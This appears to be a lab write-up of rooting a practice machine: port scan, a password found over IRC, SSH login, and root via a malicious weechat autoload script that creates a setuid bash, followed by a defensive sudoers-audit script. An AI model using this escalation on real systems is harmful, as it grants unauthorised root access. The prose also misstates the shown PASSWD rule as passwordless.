Group member's target machine: bala

bala

nmap -p- 10.146.254.166 
Host is up (0.0031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc

Port 80 serves a page explaining some basics of the IRC protocol. Connect to the IRC service with HexChat.

_   _                 _____                              
*  | \ | | _____      __ |_   _|__  __ _ _ __ ___   ___ _ __ 
*  |  \| |/ _ \ \ /\ / /   | |/ _ \/ _` | '_ ` _ \ / _ \ '__|
*  | |\  |  __/\ V  V /    | |  __/ (_| | | | | | |  __/ |   
*  |_| \_|\___| \_/\_/     |_|\___|\__,_|_| |_| |_|\___|_|   
*  
*  fzer
*  /msg
* End of message of the day.

Chatting with bala yields the password ai01ClGAXoYpeevwNMS1. Trying it over SSH shows it does not belong to bala; trying fzer logs in successfully.

sudo -l
[sudo] password for fzer: 
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat

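This shows that weechat can be run via sudo without a password.

The weechat help lists the option: -d, --dir <path> set WeeChat home directory (default: ~/.weechat). On startup, weechat automatically loads every py script under ~/.weechat/python/autoload/, so the idea is to place a malicious script in that path under a home directory we control and escalate privileges.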

mkdir -p /home/fzer/getroot/{python/autoload,logs}

Privilege escalation script

import os
os.system('cp /bin/bash /home/fzer/rootbash; chmod +s /home/fzer/rootbash')

sudo weechat --dir /home/fzer/getroot
./rootbash -p
rootbash-5.0# id
uid=1000(fzer) gid=1000(fzer) euid=0(root) egid=0(root) groups=0(root),1000(fzer)
rootbash-5.0# cat /home/fzer/user.txt
flag{user-d3613deb71ef676e8883ffd60450262e}
rootbash-5.0# cat /root/root.txt
flag{root-a73c45107081c08dd4560206b8ef8205}
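From the defender's side, the root cause is the sudoers rule itself. The following added example (not part of the original post) parses `sudo -l` output and flags rules that run a script-loading program as root; the SCRIPT_LOADERS set and the second sample rule are assumptions made for illustration.

```python
import re

# Assumed, non-exhaustive set of programs that load user-supplied scripts or
# plugins at startup; weechat is the one from this page.
SCRIPT_LOADERS = {"weechat", "irssi", "vim", "python3", "perl"}

RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S.*)$")

# sudo -l output from the page, plus one constructed rule for contrast.
SAMPLE = r"""Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat
    (root) NOPASSWD: /usr/bin/systemctl status nginx
"""

def parse_rules(text):
    """Yield (run_as_users, tags, path, args) per command in `sudo -l` output."""
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        tags = re.findall(r"[A-Z_]+", m.group(2))
        for cmd in re.split(r"(?<!\\),\s*", m.group(3)):
            path, _, args = cmd.strip().partition(" ")
            yield users, tags, path, args.strip() or None

def audit(text):
    """Flag rules that run a script-loading program as root."""
    findings = []
    for users, tags, path, args in parse_rules(text):
        as_root = any(u in ("ALL", "root") for u in users)
        if as_root and path.rsplit("/", 1)[-1] in SCRIPT_LOADERS:
            findings.append({
                "command": path,
                # No arguments in the rule means sudo accepts any arguments,
                # so options such as weechat's --dir are caller-controlled.
                "any_arguments": args is None,
                "password_required": "NOPASSWD" not in tags,
            })
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Restricting the arguments alone does not make such a rule safe, because the program can still load scripts once it is running; a finding here is a prompt to remove the rule or run the client unprivileged.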
posted @ 2025-11-08 16:30  场-room